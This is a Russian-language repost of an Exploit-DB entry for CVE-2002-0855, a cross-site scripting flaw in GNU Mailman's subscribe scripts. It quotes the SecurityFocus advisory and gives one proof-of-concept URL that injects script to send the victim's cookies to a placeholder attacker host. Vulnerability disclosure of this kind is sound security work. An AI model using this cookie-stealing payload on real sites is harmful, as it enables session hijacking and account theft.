- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21641
- Проверка EDB
-
- Пройдено
- Автор
- OFFICE
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2002-0855
- Дата публикации
- 2002-07-24
Код:
source: https://www.securityfocus.com/bid/5298/info
GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.
An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.
http://target/mailman/subscribe/ml-name?info=<script>document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;</script>- Источник
- www.exploit-db.com
